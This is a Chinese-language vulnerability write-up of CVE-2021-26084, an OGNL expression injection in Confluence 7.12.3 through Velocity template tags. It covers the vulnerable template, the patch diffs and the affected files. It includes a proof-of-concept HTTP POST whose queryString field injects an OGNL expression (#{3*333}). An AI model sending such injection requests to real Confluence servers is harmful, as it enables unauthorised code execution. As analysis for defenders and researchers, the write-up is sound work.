CVE-2021-26084 漏洞分析

2023-10-17 17:52
文章标签 分析 漏洞 2021 cve 26084

本文主要是介绍CVE-2021-26084 漏洞分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

基础知识

Velocity

  • .vm 结尾的文件一般为Velocity模板文件
  • $action
    • $action 是 velocity 上下⽂中的⼀个变量,⼀般在进⾏模板渲染前会设置到 context ⾥⾯。
    • $action 是当前访问路由对应的具体 Action 类。
    • $action.xxx 表⽰取对应 Action 类的 xxx 属性值

  • ${} 和 $!{}
    • ${} 输出表达式的计算结果,并进行过滤
    • $!{} 原样输出表达式的计算结果,不进行任何过滤
  • Velocity自定义标签
    • velocity ⾃定义的标签必须实现 Directive 类的 getName()、getType()、render() 三个⽅法。
    • getName() ⽅法表⽰标签的名字;getType() ⽅法则表⽰是⾏标签(LINE) 还是块标签(BLOCK); render() ⽅法则⽤来实现标签的具体处理逻辑。
  • velocity.properties 文件
    • 模板引擎初始化时会加载此文件
    • 配置log, 字符集编码等
    • userdirective:自定义函数路径

WebWork

  • 路由逻辑

Confluence

  • Confluence 7.12.3 依赖 Velocity 1.6.4
  • Confluence 自定义 Velocity 标签 Tag

OGNL表达式注入

漏洞环境版本

  • 7.12.3

漏洞原理

  • Confluence自定义的tag标签在渲染过程中在渲染$!的变量时会使用Ognl表达式来渲染
  • 检查手段被绕过
  • POC
POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45queryString=aaaa\u0027%2b#{3*333}%2b\u0027bbb
  • 对应模板文件: confluence/pages/createpage-entervariables.vm
<html><head>#requireResource("confluence.web.resources:page-templates")<title>$action.getText("page.template.wizard")</title></head><body>#parse ( "/template/includes/actionerrors.vm" )#applyDecorator("root")#decoratorParam("helper" $action.helper)#decoratorParam("context" "space-pages")#decoratorParam("mode" "create-page")<div class="padded"><div class="steptitle" style="margin-top: 10px">$action.getText('pagevariables.step2')</div><p>$action.getText('text.pagevariables.step2.instructions')</p><div class="smallfont view-template"><div class="wiki-content">$action.renderedTemplateContent</div></div><form name="filltemplateform" method="POST" action="doenterpagevariables.action">#form_xsrfToken()#tag ("Hidden" "name='queryString'" "value='$!queryString'")#tag ("Hidden" "name='templateId'" "value='$pageTemplate.id'")#tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")#tag ("Hidden" "name='title'" "value=title")#tag ("Hidden" "name='parentPageId'" "value=parentPageId")#tag ("Hidden" "name='fromPageId'" "value=fromPageId")#tag ("Hidden" "name='spaceKey'" "value=spaceKey")<div class="aui-toolbar2" role="toolbar"><div class="aui-toolbar2-inner"><input class="aui-button" type="button" value="$action.getText('back.witharrows.name')" onclick="javascript:history.go(-1)">#tag( "Submit" "name='confirm'" "id=confirm" "value='next.name'" "theme='notable'" "cssClass='aui-button'")</div></div></form>#parse ( "/pages/page-breadcrumbs.vm" )</div>#end</body>
</html>

漏洞修复

补丁

  • 补丁脚本运行结果
File 1: 'confluence/users/user-dark-features.vm':a. backing up file.. doneb. updating file.. donec. showing file changes..
70c70
<             #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value='$!action.featureKey'" "theme='aui'" "template='text.vm'")
---
>             #tag( "Component" "label='Enable dark feature:'" "name='featureKey'" "value=featureKey" "theme='aui'" "template='text.vm'")d. validating file changes.. oke. file updated successfully!File 2: 'confluence/login.vm':a. backing up file.. doneb. updating file.. donec. showing file changes..
147c147
<                         #tag( "Hidden" "name='token'" "value='$!action.token'" )
---
>                         #tag( "Hidden" "name='token'" "value=token" )d. validating file changes.. oke. file updated successfully!File 3: 'confluence/pages/createpage-entervariables.vm':a. backing up file.. doneb. updating file.. donec. showing file changes..
24c24
<                 #tag ("Hidden" "name='queryString'" "value='$!queryString'")
---
>                 #tag ("Hidden" "name='queryString'" "value=queryString")
26c26
<                 #tag ("Hidden" "name='linkCreation'" "value='$linkCreation'")
---
>                 #tag ("Hidden" "name='linkCreation'" "value=linkCreation")d. validating file changes..oke. file updated successfully!File 4: 'confluence/template/custom/content-editor.vm':a. backing up file.. doneb. updating file.. donec. showing file changes..
64c64
<         #tag ("Hidden" "name='queryString'" "value='$!queryString'")
---
>         #tag ("Hidden" "name='queryString'" "value=queryString")
85c85
<             #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value='${templateId}'")
---
>             #tag ("Hidden" "id=sourceTemplateId" "name='sourceTemplateId'" "value=templateId")d. file updated successfully!File 5: 'confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader*.jar':a. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar..
Archive:  confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jarinflating: ./templates/editor-preload-container.vmb. updating file.. donec. showing file changes..
56c56
< #tag ("Hidden" "id=syncRev" "name='syncRev'" "value='$!{action.syncRev}'")
---
> #tag ("Hidden" "id=syncRev" "name='syncRev'" "value=syncRev")d. validating file changes.. oke. updating confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar with ./templates/editor-preload-container.vm..updating: templates/editor-preload-container.vm (deflated 59%)
-rw-r--r--  1 zhangxinqi  staff  13369  8 27 02:02 confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jarf. cleaning up temp files..okg. extracting templates/editor-preload-container.vm from confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jar again to check changes within JAR..
Archive:  confluence/WEB-INF/atlassian-bundled-plugins/confluence-editor-loader-7.12.3.jarinflating: ./templates/editor-preload-container.vmh. validating file changes for file within updated JAR.. oki. cleaning up temp files..okUpdate completed!
  • 将模板文件中的$!删除
  • $action $!action 都删除
  • 所有的改动都位于tag标签下
  • 涉及5个文件的更改
    • confluence/users/user-dark-features.vm
      • http://127.0.0.1:8090/users/darkfeatures.action
      • 相关文档:Enable Edit in Office as a dark feature in Confluence | Confluence | Atlassian Documentation
    • confluence/login.vm
      • 注册功能
    • confluence/pages/createpage-entervariables.vm
      • http://127.0.0.1:8090/pages/doenterpagevariables.action
    • confluence/template/custom/content-editor.vm
    • templates/editor-preload-container.vm

参考资料

  • Confluence objects accessible from Velocity (atlassian.com)
  • dinhbaouit/CVE-2021-26084 (github.com)

这篇关于CVE-2021-26084 漏洞分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/227009

相关文章

MyBatis-Plus中Service接口的lambdaUpdate用法及实例分析

《MyBatis-Plus中Service接口的lambdaUpdate用法及实例分析》本文将详细讲解MyBatis-Plus中的lambdaUpdate用法,并提供丰富的案例来帮助读者更好地理解和应... 目录深入探索MyBATis-Plus中Service接口的lambdaUpdate用法及示例案例背景

MyBatis-Plus中静态工具Db的多种用法及实例分析

《MyBatis-Plus中静态工具Db的多种用法及实例分析》本文将详细讲解MyBatis-Plus中静态工具Db的各种用法,并结合具体案例进行演示和说明,具有很好的参考价值,希望对大家有所帮助,如有... 目录MyBATis-Plus中静态工具Db的多种用法及实例案例背景使用静态工具Db进行数据库操作插入

Go使用pprof进行CPU,内存和阻塞情况分析

《Go使用pprof进行CPU,内存和阻塞情况分析》Go语言提供了强大的pprof工具,用于分析CPU、内存、Goroutine阻塞等性能问题,帮助开发者优化程序,提高运行效率,下面我们就来深入了解下... 目录1. pprof 介绍2. 快速上手:启用 pprof3. CPU Profiling:分析 C

MySQL表锁、页面锁和行锁的作用及其优缺点对比分析

《MySQL表锁、页面锁和行锁的作用及其优缺点对比分析》MySQL中的表锁、页面锁和行锁各有特点,适用于不同的场景,表锁锁定整个表,适用于批量操作和MyISAM存储引擎,页面锁锁定数据页,适用于旧版本... 目录1. 表锁(Table Lock)2. 页面锁(Page Lock)3. 行锁(Row Lock

Springboot中分析SQL性能的两种方式详解

《Springboot中分析SQL性能的两种方式详解》文章介绍了SQL性能分析的两种方式:MyBatis-Plus性能分析插件和p6spy框架,MyBatis-Plus插件配置简单,适用于开发和测试环... 目录SQL性能分析的两种方式:功能介绍实现方式:实现步骤:SQL性能分析的两种方式:功能介绍记录

最长公共子序列问题的深度分析与Java实现方式

《最长公共子序列问题的深度分析与Java实现方式》本文详细介绍了最长公共子序列(LCS)问题,包括其概念、暴力解法、动态规划解法,并提供了Java代码实现,暴力解法虽然简单,但在大数据处理中效率较低,... 目录最长公共子序列问题概述问题理解与示例分析暴力解法思路与示例代码动态规划解法DP 表的构建与意义动

C#使用DeepSeek API实现自然语言处理,文本分类和情感分析

《C#使用DeepSeekAPI实现自然语言处理,文本分类和情感分析》在C#中使用DeepSeekAPI可以实现多种功能,例如自然语言处理、文本分类、情感分析等,本文主要为大家介绍了具体实现步骤,... 目录准备工作文本生成文本分类问答系统代码生成翻译功能文本摘要文本校对图像描述生成总结在C#中使用Deep

SQL注入漏洞扫描之sqlmap详解

《SQL注入漏洞扫描之sqlmap详解》SQLMap是一款自动执行SQL注入的审计工具,支持多种SQL注入技术,包括布尔型盲注、时间型盲注、报错型注入、联合查询注入和堆叠查询注入... 目录what支持类型how---less-1为例1.检测网站是否存在sql注入漏洞的注入点2.列举可用数据库3.列举数据库

Redis主从/哨兵机制原理分析

《Redis主从/哨兵机制原理分析》本文介绍了Redis的主从复制和哨兵机制,主从复制实现了数据的热备份和负载均衡,而哨兵机制可以监控Redis集群,实现自动故障转移,哨兵机制通过监控、下线、选举和故... 目录一、主从复制1.1 什么是主从复制1.2 主从复制的作用1.3 主从复制原理1.3.1 全量复制

Redis主从复制的原理分析

《Redis主从复制的原理分析》Redis主从复制通过将数据镜像到多个从节点,实现高可用性和扩展性,主从复制包括初次全量同步和增量同步两个阶段,为优化复制性能,可以采用AOF持久化、调整复制超时时间、... 目录Redis主从复制的原理主从复制概述配置主从复制数据同步过程复制一致性与延迟故障转移机制监控与维